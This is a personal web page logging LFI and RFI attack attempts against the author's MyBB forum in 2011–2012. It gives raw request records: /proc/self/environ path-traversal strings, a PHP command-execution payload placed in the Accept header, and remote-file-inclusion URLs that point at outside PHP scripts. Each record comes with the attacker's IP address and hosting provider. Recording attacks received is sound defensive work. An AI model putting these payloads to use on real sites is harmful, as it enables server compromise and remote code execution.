/proc/self/environ LFI and RFI vulnerability tests (since <= August 2011) | Joachim De Zutter
28th of February 2012, it came to my attention that from IP addresses 201.79.83.41, 177.103.236.160 and 84.91.2.230, the vulnerability of MyBB forum showthread.php code was tested to check for execution of arbitrary commands by local file inclusion via the /proc/self/environ method.
---
Remote Address: 201.79.83.41 (201.79.83.41) Remote Port : 61541
Via: 
Forwarded For:  ()
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Request URI: /forum/myBB/showthread.php?tid=../../../../../../../../../../../../../../../../proc/self/environ
Protocol: HTTP/1.0
Accepted: <?php system('echo hacked123');exec('echo hacked123');shell_exec('echo hacked123');passthru('echo hacked123'); ?>
Accepted Language: en-us
Accepted Encoding: 
Accepted Charset: 
Connection: Keep-Alive
Proxy-connection: 
Referrer (ROT13): 
Date/Time: Tue Feb 28 1:37:38 CET 2012
---
Remote Address: 177.103.236.160 (DSL_ROUTE) Remote Port : 3379
Via: 
Forwarded For:  ()
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 
Firefox/10.0.2
Request URI: /forum/myBB/showthread.php?tid=../../../../../../../../../../../../../../../../proc/self/environ
Protocol: HTTP/1.1
Accepted: <?php system('echo hacked123');exec('echo hacked123');shell_exec('echo hacked123');passthru('echo hacked123'); ?>
Accepted Language: en-us
Accepted Encoding: 
Accepted Charset: 
Connection: Keep-Alive
Proxy-connection: 
Referrer (ROT13): 
Date/Time: Tue Feb 28 1:52:29 CET 2012
---
Remote Address: 84.91.2.230 (pa1-84-91-2-230.netvisao.pt) Remote 
Port : 47672
Via: 1.0 ebox.example.com:3128 (squid/2.5.STABLE13)
Forwarded For: 172.31.20.63 (172.31.20.63)
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Request URI: /forum/myBB/showthread.php?tid=../../../../../../../../../../../../../../../../proc/self/environ
Protocol: HTTP/1.0
Accepted: <?php system('echo hacked123');exec('echo hacked123');shell_exec('echo hacked123');passthru('echo hacked123'); ?>
Accepted Language: en-us
Accepted Encoding: 
Accepted Charset: 
Connection: keep-alive
Proxy-connection: 
Referrer (ROT13): 
Date/Time: Tue Feb 28 17:23:00 CET 2012
---
http://www.utrace.de/?query=201.79.83.41
Provider: Telemar Norte Leste S.A., Region: Castelo (Brazil)

http://www.utrace.de/?query=177.103.236.160
Provider: TELECOMUNICACOES DE SAO PAULO S.A. - TELESP, Region: Guaruj (Brazil)

http://www.utrace.de/?query=84.91.2.230
Provider: Cabovisao, televisao por cabovisao, sa, Region: Mafra (Portugal)

On 29th of February 2012, the vulnerability was tested again:
---
Remote Address: 189.79.26.92 (189-79-26-92.dsl.telesp.net.br) Remote Port : 14183
Via: 
Forwarded For:  ()
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Request URI: /forum/myBB/showthread.php?tid=../../../../../../../../../../../../../../../../proc/self/environ
Protocol: HTTP/1.0
Accepted: 
Accepted Language: en-us
Accepted Encoding: 
Accepted Charset: 
Connection: Keep-Alive
Proxy-connection: 
Referrer (ROT13): 
Date/Time: Wed Feb 29 21:28:05 CET 2012
---
http://www.utrace.de/?query=189.79.26.92
Provider: TELECOMUNICACOES DE SAO PAULO S.A. - TELESP, Region: Guaruj (Brazil)

On the 3rd of March 2012, a remote file inclusion (RFI) vulnerability test was performed by 200.98.167.194 using the PHP script at http://www.phs31sp.org.br/cmd.txt :
---
Remote Address: 200.98.167.194 (200-98-167-194.clouduol.com.br) Remote Port : 4885
Via: 
Forwarded For:  ()
User Agent: Mozilla/3.0 (compatible; Indy Library)
Request URI: /forum/mybb/showthread.php?tid=http://www.phs31sp.org.br/cmd.txt?
Protocol: HTTP/1.1
Accepted: text/html, */*
Accepted Language: 
Accepted Encoding: 
Accepted Charset: 
Connection: 
Proxy-connection: 
Referrer (ROT13): 
Date/Time: Sat Mar 3 13:15:12 CET 2012
---
http://www.utrace.de/?query=200.98.167.194
Provider: Universo Online S.A. (Brazil)

On the 29th of May 2012, a remote file inclusion (RFI) vulnerability test was performed by 200.40.88.142 using the PHP script at http://www.racia.fr/en/images/menu_12.txt, which uses a PHP script at 69.64.49.239 :
---
Remote Address: 200.40.88.142 (r200-40-88-142.ae-static.anteldata.net.uy) Remote Port : 21847
Via: 
Forwarded For:  ()
User Agent: 
Request URI: /forum/myBB/showthread.php?tid=http://www.racia.fr/en/images/menu_12.txt?&servidor=www.summumplus.be/forum/myBB/showthread.php?tid=¶=tirrom2020@gmail.com
Protocol: HTTP/1.1
Accepted: 
Accepted Language: 
Accepted Encoding: 
Accepted Charset: 
Connection: 
Proxy-connection: 
Referrer (ROT13): 
Date/Time: Tue May 29 23:08:52 CEST 2012
---
http://www.utrace.de/?query=200.40.88.142
Provider: Administracion Nacional de Telecomunicaciones (Montevideo, Uruguay)

http://www.utrace.de/?query=69.64.49.239
Provider: Hosting Solutions International (Saint Louis, United States)

On the 30th of May 2012, a remote file inclusion (RFI) vulnerability test was performed by 77.79.246.241 using the PHP script at http://www.dpsdhamtari.org/latest/uploadedResumes/iti.txt :
---
Remote Address: 77.79.246.241 (p23.progreso.pl) Remote Port : 38546
Via: 
Forwarded For:  ()
User Agent: 
Request URI: /forum/myBB/showthread.php?tid=http://www.dpsdhamtari.org/latest/uploadedResumes/iti.txt?&servidor=www.summumplus.be/forum/myBB/showthread.php?tid=¶=tirrom2020@gmail.com
Protocol: HTTP/1.1
Accepted: 
Accepted Language: 
Accepted Encoding: 
Accepted Charset: 
Connection: 
Proxy-connection: 
Referrer (ROT13): Date/Time: Wed May 30 7:07:40 CEST 2012
---
http://www.utrace.de/?query=77.79.246.241
Provider: ATM S.A. (Jastrzebie Zdroj, Poland)

On 27th of October 2012, a remote file inclusion (RFI) vulnerability test was performed by 173.254.59.161 using the PHP script at http://www.navy.mil.kh/nbproject/project/private/enviador.txt :
---
Remote Address: 173.254.59.161 (173-254-59-161.rhostjh.com) Remote 
Port : 42185
Via: 
Forwarded For:  ()
User Agent: 
Request URI: /forum/myBB/showthread.php?tid=http://www.navy.mil.kh/nbproject/private/enviador.txt?&servidor=www.summumplus.be/forum/myBB/showthread.php?tid=¶=premmy35@gmail.com
Protocol: HTTP/1.1
Accepted: 
Accepted Language: 
Accepted Encoding: 
Accepted Charset: 
Connection: 
Proxy-connection: 
Referrer (ROT13): 
Date/Time: Sat Oct 27 18:17:33 CEST 2012
---
http://www.utrace.de/?query=173.254.59.161
Provider: Bluehost (Provo, United States)

On 3rd of September 2011, a remote file inclusion (RFI) vulnerability test was performed with the same e-mail address (premmy35@gmail.com) by 216.155.72.42 using the PHP script at http://www.fpe.sn/webcam/enviador.txt :
---
Remote Address: 216.155.72.42(doctor.taxista.cl) Remote Port : 54453
Via: 
Forwarded For:  ()
User Agent: 
Request URI: 
/forum/myBB/showthread.php?tid=http://www.fpe.sn/webcam/enviador.txt?&servidor=www.summumplus.be/forum/myBB/showthread.php?tid=¶=premmy35@gmail.com
Accepted: 
Accepted Language: 
Accepted Encoding: 
Accepted Charset: 
Referrer: 
Date/Time: Sat Sep 3 22:53:07 CEST 2011
---
http://www.utrace.de/?query=216.155.72.42
Provider: Telefonica del Sur S.A. (Valdivia, Chili)

On 25th of October 2011, a remote file inclusion (RFI) vulnerability test was performed with the same e-mail address (premmy35@gmail.com) by 211.220.195.85 using the PHP script at http://www.sylt-architektur.de/_notes/Bots/enviador.txt :
---
Remote Address: 211.220.195.85 (211.220.195.85) Remote Port : 57721
Via: 
Forwarded For:  ()
User Agent: 
Request URI: 
/forum/myBB/showthread.php?tid=http://www.sylt-architektur.de/_notes/Bots/enviador.txt?&servidor=www.summumplus.be/forum/myBB/showthread.php?tid=¶=premmy35@gmail.com
Accepted: 
Accepted Language: 
Accepted Encoding: 
Accepted Charset: 
Referrer (ROT13): 
Date/Time: Tue Oct 25 9:35:37 CEST 2011
---
http://www.utrace.de/?query=211.220.195.85
Provider: Korea Telecom (Busan, Korea)

On 19th of October 2012, an unknown attacker requested for /proc/self/environ from/via IP 95.211.134.32 :
---
Remote Address: 95.211.134.32 (ns1.tbyteweb.net) Remote Port : 53417 (BLACKLISTED AT STOP FORUM SPAM)
Via: 
Forwarded For:  ()
User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Request URI: /forum/myBB/index.php?option=com_abbrev&controller=..//..//..//..//..//..//..//..///proc/self/environ%0000
Protocol: HTTP/1.1
Accepted: 
Accepted Language: 
Accepted Encoding: 
Accepted Charset: 
Connection: TE, close
Proxy-connection: 
Referrer (ROT13): 
Date/Time: Fri Oct 19 7:24:09 CEST 2012
---
http://www.utrace.de/?query=95.211.134.32
Provider: LeaseWeb B.V. (Deventer, The Netherlands)

And shortly after there was a similar request from/via IP 46.254.17.117 :
---
Remote Address: 46.254.17.117 (www.moyserv.ru) Remote Port : 34803
Via: 
Forwarded For:  ()
User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Request URI: /forum/myBB/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%0000
Protocol: HTTP/1.1
Accepted: 
Accepted Language: 
Accepted Encoding: 
Accepted Charset: 
Connection: TE, close
Proxy-connection: 
Referrer (ROT13): 
Date/Time: Fri Oct 19 7:27:49 CEST 2012
---
http://www.utrace.de/?query=46.254.17.117
Provider: Internet-Hosting Ltd, Organisation: IHC.RU network in Eserver.ru (Russia)

Followed by another request:
---
Remote Address: 95.211.134.32 (ns1.tbyteweb.net) Remote Port : 33439 (BLACKLISTED AT STOP FORUM SPAM)
Via: 
Forwarded For:  ()
User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Request URI: /forum/myBB/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%0000
Protocol: HTTP/1.1
Accepted: 
Accepted Language: 
Accepted Encoding: 
Accepted Charset: 
Connection: TE, close
Proxy-connection: 
Referrer (ROT13): 
Date/Time: Fri Oct 19 7:42:29 CEST 2012
---

We also found the following entries in our logs:
189.114.93.100, 8/20/2011, 20:26:32, GET, /matchmaker/forum/adminLogin.php, config[forum_installed]=../../../../../../../../../../../../../../../proc/self/environ%00
189.114.93.100, 8/20/2011, 20:26:33, GET, /forum/adminLogin.php, config[forum_installed]=../../../../../../../../../../../../../../../proc/self/environ%00
189.114.93.100, 8/20/2011, 20:47:38, GET, /matchmaker/forum/adminLogin.php, config[forum_installed]=../../../../../../../../../../../../../../../proc/self/environ%00
189.114.93.100, 8/20/2011, 20:47:39, GET, /forum/adminLogin.php, config[forum_installed]=../../../../../../../../../../../../../../../proc/self/environ%00